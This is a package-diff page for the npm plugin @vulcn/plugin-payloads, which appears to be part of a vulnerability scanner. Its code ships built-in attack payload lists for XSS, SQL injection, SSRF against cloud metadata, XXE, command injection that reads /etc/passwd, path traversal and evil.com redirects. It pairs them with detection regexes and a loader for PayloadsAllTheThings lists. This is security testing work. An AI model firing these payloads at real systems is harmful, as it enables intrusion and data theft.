npm - @vulcn/plugin-payloads - Versions diffs - 0.1.0 - Mend

@vulcn/plugin-payloads 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/dist/index.js ADDED Viewed

@@ -0,0 +1,572 @@
+// src/index.ts
+import { z as z2 } from "zod";
+// src/builtin.ts
+var BUILTIN_PAYLOADS = {
+  // XSS Payloads
+  "xss-basic": {
+    name: "xss-basic",
+    category: "xss",
+    description: "Basic XSS payloads with script tags and event handlers",
+    source: "builtin",
+    payloads: [
+      '<script>alert("XSS")</script>',
+      '<img src=x onerror=alert("XSS")>',
+      '"><script>alert("XSS")</script>',
+      "javascript:alert('XSS')",
+      '<svg onload=alert("XSS")>'
+    ],
+    detectPatterns: [
+      /<script[^>]*>alert\(/i,
+      /onerror\s*=\s*alert\(/i,
+      /onload\s*=\s*alert\(/i,
+      /javascript:alert\(/i
+    ]
+  },
+  "xss-event": {
+    name: "xss-event",
+    category: "xss",
+    description: "XSS via event handlers",
+    source: "builtin",
+    payloads: [
+      '" onfocus="alert(1)" autofocus="',
+      "' onmouseover='alert(1)'",
+      '<body onload=alert("XSS")>',
+      "<input onfocus=alert(1) autofocus>",
+      "<marquee onstart=alert(1)>",
+      "<video src=x onerror=alert(1)>",
+      "<audio src=x onerror=alert(1)>"
+    ],
+    detectPatterns: [
+      /onfocus\s*=\s*["']?alert/i,
+      /onmouseover\s*=\s*["']?alert/i,
+      /onload\s*=\s*["']?alert/i,
+      /onstart\s*=\s*["']?alert/i,
+      /onerror\s*=\s*["']?alert/i
+    ]
+  },
+  "xss-svg": {
+    name: "xss-svg",
+    category: "xss",
+    description: "XSS via SVG elements",
+    source: "builtin",
+    payloads: [
+      '<svg/onload=alert("XSS")>',
+      "<svg><script>alert(1)</script></svg>",
+      "<svg><animate onbegin=alert(1)>",
+      "<svg><set onbegin=alert(1)>",
+      '<svg><foreignObject><iframe srcdoc="<script>alert(1)</script>">'
+    ],
+    detectPatterns: [
+      /<svg[^>]*onload\s*=/i,
+      /<svg[^>]*>.*<script>/i,
+      /onbegin\s*=\s*alert/i
+    ]
+  },
+  "xss-polyglot": {
+    name: "xss-polyglot",
+    category: "xss",
+    description: "XSS polyglot payloads that work in multiple contexts",
+    source: "builtin",
+    payloads: [
+      "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//",
+      `'"-->]]>*/</script><script>alert(1)</script>`,
+      "<img src=x:x onerror=alert(1)//",
+      "'-alert(1)-'",
+      '"><img src=x onerror=alert(1)>'
+    ],
+    detectPatterns: [/alert\s*\(\s*\d*\s*\)/i, /<script>/i, /onerror\s*=/i]
+  },
+  // SQL Injection Payloads
+  "sqli-basic": {
+    name: "sqli-basic",
+    category: "sqli",
+    description: "Basic SQL injection payloads",
+    source: "builtin",
+    payloads: [
+      "' OR '1'='1",
+      "' OR '1'='1' --",
+      "1' OR '1'='1",
+      "admin'--",
+      "' UNION SELECT NULL--",
+      "1; DROP TABLE users--"
+    ],
+    detectPatterns: [
+      /sql.*syntax/i,
+      /mysql.*error/i,
+      /ORA-\d{5}/i,
+      /pg_query/i,
+      /sqlite.*error/i,
+      /unclosed.*quotation/i
+    ]
+  },
+  "sqli-error": {
+    name: "sqli-error",
+    category: "sqli",
+    description: "SQL injection payloads to trigger errors",
+    source: "builtin",
+    payloads: [
+      "'",
+      "''",
+      "`",
+      '"',
+      "')",
+      `'"`,
+      "1' AND '1'='2",
+      "1 AND 1=2",
+      "1'1",
+      "1 exec sp_"
+    ],
+    detectPatterns: [
+      /sql.*syntax/i,
+      /mysql.*error/i,
+      /ORA-\d{5}/i,
+      /postgresql.*error/i,
+      /sqlite.*error/i,
+      /quoted.*string.*properly.*terminated/i,
+      /ODBC.*Driver/i,
+      /Microsoft.*ODBC/i
+    ]
+  },
+  "sqli-blind": {
+    name: "sqli-blind",
+    category: "sqli",
+    description: "Blind SQL injection payloads (timing-based)",
+    source: "builtin",
+    payloads: [
+      "1' AND SLEEP(5)--",
+      "1; WAITFOR DELAY '0:0:5'--",
+      "1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
+      "1' AND (SELECT SUBSTRING(@@version,1,1))='5'--",
+      "1 AND SLEEP(5)"
+    ],
+    detectPatterns: [
+      // Blind SQLi is detected by timing, not content patterns
+    ]
+  },
+  "sqli-union": {
+    name: "sqli-union",
+    category: "sqli",
+    description: "UNION-based SQL injection payloads",
+    source: "builtin",
+    payloads: [
+      "' UNION SELECT NULL--",
+      "' UNION SELECT NULL,NULL--",
+      "' UNION SELECT NULL,NULL,NULL--",
+      "' UNION SELECT 1,2,3--",
+      "' UNION SELECT username,password FROM users--",
+      "1 UNION SELECT ALL FROM information_schema.tables--"
+    ],
+    detectPatterns: [
+      /sql.*syntax/i,
+      /column.*count/i,
+      /different.*number.*columns/i
+    ]
+  },
+  // SSRF Payloads
+  "ssrf-basic": {
+    name: "ssrf-basic",
+    category: "ssrf",
+    description: "Server-Side Request Forgery payloads",
+    source: "builtin",
+    payloads: [
+      "http://localhost",
+      "http://127.0.0.1",
+      "http://[::1]",
+      "http://169.254.169.254/latest/meta-data/",
+      "http://metadata.google.internal/",
+      "http://0.0.0.0",
+      "file:///etc/passwd",
+      "dict://localhost:11211/",
+      "gopher://localhost:25/_HELO"
+    ],
+    detectPatterns: [
+      /root:.*:0:0/i,
+      // /etc/passwd content
+      /ami-id/i,
+      // AWS metadata
+      /instance-id/i,
+      /\{"Code"\s*:/i
+      // Cloud metadata JSON
+    ]
+  },
+  // XXE Payloads
+  "xxe-basic": {
+    name: "xxe-basic",
+    category: "xxe",
+    description: "XML External Entity injection payloads",
+    source: "builtin",
+    payloads: [
+      '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
+      '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://localhost">]><foo>&xxe;</foo>',
+      '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
+      '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><data>&file;</data>'
+    ],
+    detectPatterns: [
+      /root:.*:0:0/i,
+      /\[fonts\]/i,
+      // win.ini content
+      /\[extensions\]/i
+    ]
+  },
+  // Command Injection Payloads
+  "cmd-basic": {
+    name: "cmd-basic",
+    category: "command-injection",
+    description: "OS command injection payloads",
+    source: "builtin",
+    payloads: [
+      "; id",
+      "| id",
+      "& id",
+      "&& id",
+      "|| id",
+      "`id`",
+      "$(id)",
+      "; cat /etc/passwd",
+      "| cat /etc/passwd",
+      "& whoami",
+      "| whoami",
+      "; dir",
+      "| dir"
+    ],
+    detectPatterns: [
+      /uid=\d+\([\w]+\)/i,
+      // Unix id command output
+      /root:.*:0:0/i,
+      /Volume Serial Number/i,
+      // Windows dir output
+      /Directory of/i
+    ]
+  },
+  // Path Traversal Payloads
+  "path-traversal": {
+    name: "path-traversal",
+    category: "path-traversal",
+    description: "Directory traversal payloads",
+    source: "builtin",
+    payloads: [
+      "../../../etc/passwd",
+      "..\\..\\..\\windows\\win.ini",
+      "....//....//....//etc/passwd",
+      "..%2f..%2f..%2fetc/passwd",
+      "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
+      "..%252f..%252f..%252fetc/passwd",
+      "/etc/passwd",
+      "C:\\Windows\\win.ini"
+    ],
+    detectPatterns: [/root:.*:0:0/i, /\[fonts\]/i, /\[extensions\]/i]
+  },
+  // Open Redirect Payloads
+  "open-redirect": {
+    name: "open-redirect",
+    category: "open-redirect",
+    description: "Open redirect payloads for phishing",
+    source: "builtin",
+    payloads: [
+      "//evil.com",
+      "https://evil.com",
+      "/\\evil.com",
+      "//evil.com/%2f..",
+      "////evil.com",
+      "https:evil.com",
+      "//evil%E3%80%82com",
+      "javascript:alert(document.domain)"
+    ],
+    detectPatterns: [
+      // Open redirects are detected by observing the redirect behavior
+    ]
+  }
+};
+// src/loaders/payloadbox.ts
+var PAYLOADBOX_URLS = {
+  xss: "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/IntrudersXSS.txt",
+  "sql-injection": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/Auth_Bypass.txt",
+  xxe: "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XXE%20Injection/Intruders/xxe_payloads.txt",
+  "command-injection": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Command%20Injection/Intruder/command_exec.txt",
+  "open-redirect": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt",
+  "path-traversal": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt"
+};
+var CATEGORY_MAP = {
+  xss: "xss",
+  "sql-injection": "sqli",
+  xxe: "xxe",
+  "command-injection": "command-injection",
+  "open-redirect": "open-redirect",
+  "path-traversal": "path-traversal"
+};
+var cache = /* @__PURE__ */ new Map();
+function getPayloadBoxTypes() {
+  return Object.keys(PAYLOADBOX_URLS);
+}
+function isPayloadBoxType(type) {
+  return type in PAYLOADBOX_URLS;
+}
+async function loadPayloadBox(type, limit = 50, fetchFn = globalThis.fetch) {
+  if (!isPayloadBoxType(type)) {
+    throw new Error(
+      `Unknown PayloadBox type: ${type}. Available: ${getPayloadBoxTypes().join(", ")}`
+    );
+  }
+  const cached = cache.get(type);
+  if (cached) {
+    return cached;
+  }
+  const url = PAYLOADBOX_URLS[type];
+  try {
+    const response = await fetchFn(url);
+    if (!response.ok) {
+      throw new Error(
+        `Failed to fetch: ${response.status} ${response.statusText}`
+      );
+    }
+    const text = await response.text();
+    const payloads = text.split("\n").map((line) => line.trim()).filter((line) => line && !line.startsWith("#")).slice(0, limit);
+    if (payloads.length === 0) {
+      throw new Error(`No payloads found in ${type}`);
+    }
+    const payload = {
+      name: `payloadbox:${type}`,
+      category: CATEGORY_MAP[type],
+      description: `PayloadsAllTheThings ${type} - ${payloads.length} payloads`,
+      payloads,
+      detectPatterns: getDefaultPatterns(type),
+      source: "payloadbox"
+    };
+    cache.set(type, payload);
+    return payload;
+  } catch (err) {
+    throw new Error(
+      `Failed to fetch PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`
+    );
+  }
+}
+function getDefaultPatterns(type) {
+  switch (type) {
+    case "xss":
+      return [
+        /<script[^>]*>alert\(/i,
+        /onerror\s*=\s*alert\(/i,
+        /onload\s*=\s*alert\(/i,
+        /javascript:alert\(/i
+      ];
+    case "sql-injection":
+      return [
+        /sql.*syntax/i,
+        /mysql.*error/i,
+        /ORA-\d{5}/i,
+        /pg_query/i,
+        /sqlite.*error/i
+      ];
+    case "xxe":
+      return [/root:.*:0:0/i, /\[fonts\]/i];
+    case "command-injection":
+      return [/uid=\d+\([\w]+\)/i, /root:.*:0:0/i];
+    case "open-redirect":
+      return [];
+    // Detected by redirect behavior
+    case "path-traversal":
+      return [/root:.*:0:0/i, /\[fonts\]/i, /\[extensions\]/i];
+    default:
+      return [];
+  }
+}
+// src/loaders/file.ts
+import { readFile } from "fs/promises";
+import { resolve, isAbsolute, extname } from "path";
+import YAML from "yaml";
+import { z } from "zod";
+var PAYLOAD_CATEGORIES = [
+  "xss",
+  "sqli",
+  "ssrf",
+  "xxe",
+  "command-injection",
+  "path-traversal",
+  "open-redirect",
+  "custom"
+];
+var CustomPayloadSchema = z.object({
+  name: z.string().min(1),
+  category: z.enum(
+    PAYLOAD_CATEGORIES
+  ),
+  description: z.string().optional(),
+  payloads: z.array(z.string()).min(1),
+  detectPatterns: z.array(z.string()).optional()
+});
+var PayloadFileSchema = z.object({
+  version: z.string().optional(),
+  payloads: z.array(CustomPayloadSchema)
+});
+async function loadFromFiles(filePaths) {
+  const payloads = [];
+  for (const filePath of filePaths) {
+    const loaded = await loadFromFile(filePath);
+    payloads.push(...loaded);
+  }
+  return payloads;
+}
+async function loadFromFile(filePath) {
+  const resolved = isAbsolute(filePath) ? filePath : resolve(process.cwd(), filePath);
+  const content = await readFile(resolved, "utf-8");
+  const ext = extname(resolved).toLowerCase();
+  let data;
+  if (ext === ".json") {
+    data = JSON.parse(content);
+  } else if (ext === ".yml" || ext === ".yaml") {
+    data = YAML.parse(content);
+  } else {
+    throw new Error(
+      `Unsupported file extension: ${ext}. Use .yml, .yaml, or .json`
+    );
+  }
+  return parsePayloadData(data);
+}
+function parsePayloadData(data) {
+  const dataObj = data;
+  let parsed;
+  if (Array.isArray(data)) {
+    parsed = { version: "1", payloads: data };
+  } else if (dataObj?.name && dataObj?.category) {
+    parsed = { version: "1", payloads: [CustomPayloadSchema.parse(data)] };
+  } else if (dataObj?.payloads && Array.isArray(dataObj.payloads)) {
+    parsed = PayloadFileSchema.parse(data);
+  } else {
+    throw new Error(
+      "Invalid payload file format. Expected: array of payloads, file schema, or single payload object"
+    );
+  }
+  return parsed.payloads.map(
+    (p) => ({
+      name: p.name,
+      category: p.category,
+      description: p.description || `Custom payload: ${p.name}`,
+      payloads: p.payloads,
+      detectPatterns: parseDetectPatterns(p.detectPatterns),
+      source: "custom"
+    })
+  );
+}
+function parseDetectPatterns(patterns) {
+  if (!patterns || patterns.length === 0) {
+    return [];
+  }
+  const regexps = [];
+  for (const pattern of patterns) {
+    try {
+      regexps.push(new RegExp(pattern, "i"));
+    } catch {
+      console.warn(`Invalid regex pattern: ${pattern}`);
+    }
+  }
+  return regexps;
+}
+// src/index.ts
+var configSchema = z2.object({
+  /**
+   * Include built-in payloads (default: true)
+   */
+  builtin: z2.boolean().default(true),
+  /**
+   * Specific built-in payload names to include (if not all)
+   */
+  include: z2.array(z2.string()).optional(),
+  /**
+   * Built-in payload names to exclude
+   */
+  exclude: z2.array(z2.string()).optional(),
+  /**
+   * PayloadBox types to fetch from PayloadsAllTheThings
+   * e.g., ["xss", "sql-injection", "xxe"]
+   */
+  payloadbox: z2.array(z2.string()).optional(),
+  /**
+   * Limit per PayloadBox type
+   */
+  payloadboxLimit: z2.number().default(50),
+  /**
+   * Custom payload files to load (YAML/JSON)
+   */
+  files: z2.array(z2.string()).optional()
+});
+var plugin = {
+  name: "@vulcn/plugin-payloads",
+  version: "0.2.0",
+  apiVersion: 1,
+  description: "Official payload loader plugin - built-in, PayloadBox, and custom files",
+  configSchema,
+  hooks: {
+    onInit: async (ctx) => {
+      const config = configSchema.parse(ctx.config);
+      const loadedPayloads = [];
+      if (config.builtin) {
+        let builtinNames = Object.keys(BUILTIN_PAYLOADS);
+        if (config.include?.length) {
+          builtinNames = builtinNames.filter(
+            (name) => config.include.includes(name)
+          );
+        }
+        if (config.exclude?.length) {
+          builtinNames = builtinNames.filter(
+            (name) => !config.exclude.includes(name)
+          );
+        }
+        for (const name of builtinNames) {
+          const payload = BUILTIN_PAYLOADS[name];
+          if (payload) {
+            loadedPayloads.push(payload);
+          }
+        }
+        ctx.logger.debug(`Loaded ${builtinNames.length} built-in payload sets`);
+      }
+      if (config.payloadbox?.length) {
+        for (const type of config.payloadbox) {
+          try {
+            const payload = await loadPayloadBox(
+              type,
+              config.payloadboxLimit,
+              ctx.fetch
+            );
+            loadedPayloads.push(payload);
+            ctx.logger.debug(`Loaded PayloadBox: ${type}`);
+          } catch (err) {
+            ctx.logger.error(
+              `Failed to load PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`
+            );
+          }
+        }
+      }
+      if (config.files?.length) {
+        try {
+          const filePayloads = await loadFromFiles(config.files);
+          loadedPayloads.push(...filePayloads);
+          ctx.logger.debug(
+            `Loaded ${filePayloads.length} payload sets from files`
+          );
+        } catch (err) {
+          ctx.logger.error(
+            `Failed to load custom files: ${err instanceof Error ? err.message : String(err)}`
+          );
+        }
+      }
+      ctx.payloads.push(...loadedPayloads);
+      ctx.logger.info(
+        `Payloads plugin loaded ${loadedPayloads.length} payload sets`
+      );
+    }
+  }
+};
+var index_default = plugin;
+export {
+  BUILTIN_PAYLOADS,
+  index_default as default,
+  getPayloadBoxTypes,
+  loadFromFile,
+  loadFromFiles,
+  loadPayloadBox
+};
+//# sourceMappingURL=index.js.map

package/dist/index.js.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"sources":["../src/index.ts","../src/builtin.ts","../src/loaders/payloadbox.ts","../src/loaders/file.ts"],"sourcesContent":["/**\n * @vulcn/plugin-payloads\n * Official payload loader plugin for Vulcn\n *\n * Provides:\n * - Built-in payloads (XSS, SQLi, SSRF, XXE, etc.)\n * - PayloadBox loader (PayloadsAllTheThings)\n * - Custom file loader (YAML/JSON)\n */\n\nimport { z } from \"zod\";\nimport type { VulcnPlugin, PluginContext, RuntimePayload } from \"@vulcn/engine\";\nimport { BUILTIN_PAYLOADS } from \"./builtin\";\nimport { loadPayloadBox } from \"./loaders/payloadbox\";\nimport { loadFromFiles } from \"./loaders/file\";\n\n/**\n * Plugin configuration schema\n */\nconst configSchema = z.object({\n /**\n * Include built-in payloads (default: true)\n */\n builtin: z.boolean().default(true),\n\n /**\n * Specific built-in payload names to include (if not all)\n */\n include: z.array(z.string()).optional(),\n\n /**\n * Built-in payload names to exclude\n */\n exclude: z.array(z.string()).optional(),\n\n /**\n * PayloadBox types to fetch from PayloadsAllTheThings\n * e.g., [\"xss\", \"sql-injection\", \"xxe\"]\n */\n payloadbox: z.array(z.string()).optional(),\n\n /**\n * Limit per PayloadBox type\n */\n payloadboxLimit: z.number().default(50),\n\n /**\n * Custom payload files to load (YAML/JSON)\n */\n files: z.array(z.string()).optional(),\n});\n\nexport type PayloadsPluginConfig = z.infer<typeof configSchema>;\n\n/**\n * Payloads Plugin - loads payloads from various sources\n */\nconst plugin: VulcnPlugin = {\n name: \"@vulcn/plugin-payloads\",\n version: \"0.2.0\",\n apiVersion: 1,\n description:\n \"Official payload loader plugin - built-in, PayloadBox, and custom files\",\n\n configSchema,\n\n hooks: {\n onInit: async (ctx: PluginContext) => {\n const config = configSchema.parse(ctx.config);\n const loadedPayloads: RuntimePayload[] = [];\n\n // 1. Load built-in payloads\n if (config.builtin) {\n let builtinNames = Object.keys(BUILTIN_PAYLOADS);\n\n // Filter by include list if provided\n if (config.include?.length) {\n builtinNames = builtinNames.filter((name) =>\n config.include!.includes(name),\n );\n }\n\n // Remove excluded payloads\n if (config.exclude?.length) {\n builtinNames = builtinNames.filter(\n (name) => !config.exclude!.includes(name),\n );\n }\n\n for (const name of builtinNames) {\n const payload = BUILTIN_PAYLOADS[name];\n if (payload) {\n loadedPayloads.push(payload);\n }\n }\n\n ctx.logger.debug(`Loaded ${builtinNames.length} built-in payload sets`);\n }\n\n // 2. Load from PayloadBox\n if (config.payloadbox?.length) {\n for (const type of config.payloadbox) {\n try {\n const payload = await loadPayloadBox(\n type,\n config.payloadboxLimit,\n ctx.fetch,\n );\n loadedPayloads.push(payload);\n ctx.logger.debug(`Loaded PayloadBox: ${type}`);\n } catch (err) {\n ctx.logger.error(\n `Failed to load PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n }\n }\n\n // 3. Load from custom files\n if (config.files?.length) {\n try {\n const filePayloads = await loadFromFiles(config.files);\n loadedPayloads.push(...filePayloads);\n ctx.logger.debug(\n `Loaded ${filePayloads.length} payload sets from files`,\n );\n } catch (err) {\n ctx.logger.error(\n `Failed to load custom files: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n }\n\n // Add to shared context\n ctx.payloads.push(...loadedPayloads);\n\n ctx.logger.info(\n `Payloads plugin loaded ${loadedPayloads.length} payload sets`,\n );\n },\n },\n};\n\nexport default plugin;\n\n// Re-export for direct access\nexport { BUILTIN_PAYLOADS } from \"./builtin\";\nexport { loadPayloadBox, getPayloadBoxTypes } from \"./loaders/payloadbox\";\nexport { loadFromFiles, loadFromFile } from \"./loaders/file\";\n","/**\n * Built-in security payloads\n * Curated, tested, fast defaults for common vulnerability categories\n */\n\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/**\n * Built-in payloads - curated, tested, fast defaults\n */\nexport const BUILTIN_PAYLOADS: Record<string, RuntimePayload> = {\n // XSS Payloads\n \"xss-basic\": {\n name: \"xss-basic\",\n category: \"xss\",\n description: \"Basic XSS payloads with script tags and event handlers\",\n source: \"builtin\",\n payloads: [\n '<script>alert(\"XSS\")</script>',\n '<img src=x onerror=alert(\"XSS\")>',\n '\"><script>alert(\"XSS\")</script>',\n \"javascript:alert('XSS')\",\n '<svg onload=alert(\"XSS\")>',\n ],\n detectPatterns: [\n /<script[^>]*>alert\\(/i,\n /onerror\\s*=\\s*alert\\(/i,\n /onload\\s*=\\s*alert\\(/i,\n /javascript:alert\\(/i,\n ],\n },\n \"xss-event\": {\n name: \"xss-event\",\n category: \"xss\",\n description: \"XSS via event handlers\",\n source: \"builtin\",\n payloads: [\n '\" onfocus=\"alert(1)\" autofocus=\"',\n \"' onmouseover='alert(1)'\",\n '<body onload=alert(\"XSS\")>',\n \"<input onfocus=alert(1) autofocus>\",\n \"<marquee onstart=alert(1)>\",\n \"<video src=x onerror=alert(1)>\",\n \"<audio src=x onerror=alert(1)>\",\n ],\n detectPatterns: [\n /onfocus\\s*=\\s*[\"']?alert/i,\n /onmouseover\\s*=\\s*[\"']?alert/i,\n /onload\\s*=\\s*[\"']?alert/i,\n /onstart\\s*=\\s*[\"']?alert/i,\n /onerror\\s*=\\s*[\"']?alert/i,\n ],\n },\n \"xss-svg\": {\n name: \"xss-svg\",\n category: \"xss\",\n description: \"XSS via SVG elements\",\n source: \"builtin\",\n payloads: [\n '<svg/onload=alert(\"XSS\")>',\n \"<svg><script>alert(1)</script></svg>\",\n \"<svg><animate onbegin=alert(1)>\",\n \"<svg><set onbegin=alert(1)>\",\n '<svg><foreignObject><iframe srcdoc=\"<script>alert(1)</script>\">',\n ],\n detectPatterns: [\n /<svg[^>]*onload\\s*=/i,\n /<svg[^>]*>.*<script>/i,\n /onbegin\\s*=\\s*alert/i,\n ],\n },\n \"xss-polyglot\": {\n name: \"xss-polyglot\",\n category: \"xss\",\n description: \"XSS polyglot payloads that work in multiple contexts\",\n source: \"builtin\",\n payloads: [\n \"jaVasCript:/*-/*`/*\\\\`/*'/*\\\"/**/(/* */oNcLiCk=alert() )//\",\n \"'\\\"-->]]>*/</script><script>alert(1)</script>\",\n \"<img src=x:x onerror=alert(1)//\",\n \"'-alert(1)-'\",\n '\"><img src=x onerror=alert(1)>',\n ],\n detectPatterns: [/alert\\s*\$\\s*\\d*\\s*\$/i, /<script>/i, /onerror\\s*=/i],\n },\n\n // SQL Injection Payloads\n \"sqli-basic\": {\n name: \"sqli-basic\",\n category: \"sqli\",\n description: \"Basic SQL injection payloads\",\n source: \"builtin\",\n payloads: [\n \"' OR '1'='1\",\n \"' OR '1'='1' --\",\n \"1' OR '1'='1\",\n \"admin'--\",\n \"' UNION SELECT NULL--\",\n \"1; DROP TABLE users--\",\n ],\n detectPatterns: [\n /sql.*syntax/i,\n /mysql.*error/i,\n /ORA-\\d{5}/i,\n /pg_query/i,\n /sqlite.*error/i,\n /unclosed.*quotation/i,\n ],\n },\n \"sqli-error\": {\n name: \"sqli-error\",\n category: \"sqli\",\n description: \"SQL injection payloads to trigger errors\",\n source: \"builtin\",\n payloads: [\n \"'\",\n \"''\",\n \"`\",\n '\"',\n \"')\",\n \"'\\\"\",\n \"1' AND '1'='2\",\n \"1 AND 1=2\",\n \"1'1\",\n \"1 exec sp_\",\n ],\n detectPatterns: [\n /sql.*syntax/i,\n /mysql.*error/i,\n /ORA-\\d{5}/i,\n /postgresql.*error/i,\n /sqlite.*error/i,\n /quoted.*string.*properly.*terminated/i,\n /ODBC.*Driver/i,\n /Microsoft.*ODBC/i,\n ],\n },\n \"sqli-blind\": {\n name: \"sqli-blind\",\n category: \"sqli\",\n description: \"Blind SQL injection payloads (timing-based)\",\n source: \"builtin\",\n payloads: [\n \"1' AND SLEEP(5)--\",\n \"1; WAITFOR DELAY '0:0:5'--\",\n \"1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--\",\n \"1' AND (SELECT SUBSTRING(@@version,1,1))='5'--\",\n \"1 AND SLEEP(5)\",\n ],\n detectPatterns: [\n // Blind SQLi is detected by timing, not content patterns\n ],\n },\n \"sqli-union\": {\n name: \"sqli-union\",\n category: \"sqli\",\n description: \"UNION-based SQL injection payloads\",\n source: \"builtin\",\n payloads: [\n \"' UNION SELECT NULL--\",\n \"' UNION SELECT NULL,NULL--\",\n \"' UNION SELECT NULL,NULL,NULL--\",\n \"' UNION SELECT 1,2,3--\",\n \"' UNION SELECT username,password FROM users--\",\n \"1 UNION SELECT ALL FROM information_schema.tables--\",\n ],\n detectPatterns: [\n /sql.*syntax/i,\n /column.*count/i,\n /different.*number.*columns/i,\n ],\n },\n\n // SSRF Payloads\n \"ssrf-basic\": {\n name: \"ssrf-basic\",\n category: \"ssrf\",\n description: \"Server-Side Request Forgery payloads\",\n source: \"builtin\",\n payloads: [\n \"http://localhost\",\n \"http://127.0.0.1\",\n \"http://[::1]\",\n \"http://169.254.169.254/latest/meta-data/\",\n \"http://metadata.google.internal/\",\n \"http://0.0.0.0\",\n \"file:///etc/passwd\",\n \"dict://localhost:11211/\",\n \"gopher://localhost:25/_HELO\",\n ],\n detectPatterns: [\n /root:.*:0:0/i, // /etc/passwd content\n /ami-id/i, // AWS metadata\n /instance-id/i,\n /\\{\"Code\"\\s*:/i, // Cloud metadata JSON\n ],\n },\n\n // XXE Payloads\n \"xxe-basic\": {\n name: \"xxe-basic\",\n category: \"xxe\",\n description: \"XML External Entity injection payloads\",\n source: \"builtin\",\n payloads: [\n '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>',\n '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://localhost\">]><foo>&xxe;</foo>',\n '<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><foo>&xxe;</foo>',\n '<?xml version=\"1.0\"?><!DOCTYPE data [<!ENTITY file SYSTEM \"php://filter/convert.base64-encode/resource=index.php\">]><data>&file;</data>',\n ],\n detectPatterns: [\n /root:.*:0:0/i,\n /\\[fonts\\]/i, // win.ini content\n /\\[extensions\\]/i,\n ],\n },\n\n // Command Injection Payloads\n \"cmd-basic\": {\n name: \"cmd-basic\",\n category: \"command-injection\",\n description: \"OS command injection payloads\",\n source: \"builtin\",\n payloads: [\n \"; id\",\n \"| id\",\n \"& id\",\n \"&& id\",\n \"|| id\",\n \"`id`\",\n \"$(id)\",\n \"; cat /etc/passwd\",\n \"| cat /etc/passwd\",\n \"& whoami\",\n \"| whoami\",\n \"; dir\",\n \"| dir\",\n ],\n detectPatterns: [\n /uid=\\d+\$[\\w]+\$/i, // Unix id command output\n /root:.*:0:0/i,\n /Volume Serial Number/i, // Windows dir output\n /Directory of/i,\n ],\n },\n\n // Path Traversal Payloads\n \"path-traversal\": {\n name: \"path-traversal\",\n category: \"path-traversal\",\n description: \"Directory traversal payloads\",\n source: \"builtin\",\n payloads: [\n \"../../../etc/passwd\",\n \"..\\\\..\\\\..\\\\windows\\\\win.ini\",\n \"....//....//....//etc/passwd\",\n \"..%2f..%2f..%2fetc/passwd\",\n \"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd\",\n \"..%252f..%252f..%252fetc/passwd\",\n \"/etc/passwd\",\n \"C:\\\\Windows\\\\win.ini\",\n ],\n detectPatterns: [/root:.*:0:0/i, /\\[fonts\\]/i, /\\[extensions\\]/i],\n },\n\n // Open Redirect Payloads\n \"open-redirect\": {\n name: \"open-redirect\",\n category: \"open-redirect\",\n description: \"Open redirect payloads for phishing\",\n source: \"builtin\",\n payloads: [\n \"//evil.com\",\n \"https://evil.com\",\n \"/\\\\evil.com\",\n \"//evil.com/%2f..\",\n \"////evil.com\",\n \"https:evil.com\",\n \"//evil%E3%80%82com\",\n \"javascript:alert(document.domain)\",\n ],\n detectPatterns: [\n // Open redirects are detected by observing the redirect behavior\n ],\n },\n};\n\n/**\n * Get all built-in payload names\n */\nexport function getBuiltinPayloadNames(): string[] {\n return Object.keys(BUILTIN_PAYLOADS);\n}\n\n/**\n * Get all built-in categories\n */\nexport function getBuiltinCategories(): PayloadCategory[] {\n const categories = new Set<PayloadCategory>();\n for (const payload of Object.values(BUILTIN_PAYLOADS)) {\n categories.add(payload.category);\n }\n return Array.from(categories);\n}\n","/**\n * PayloadBox Loader\n * Fetches payloads from PayloadsAllTheThings GitHub repository\n */\n\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/**\n * Supported PayloadBox types\n */\nexport type PayloadBoxType =\n | \"xss\"\n | \"sql-injection\"\n | \"xxe\"\n | \"command-injection\"\n | \"open-redirect\"\n | \"path-traversal\";\n\n/**\n * PayloadsAllTheThings URLs - raw GitHub content\n */\nconst PAYLOADBOX_URLS: Record<PayloadBoxType, string> = {\n xss: \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/IntrudersXSS.txt\",\n \"sql-injection\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/Auth_Bypass.txt\",\n xxe: 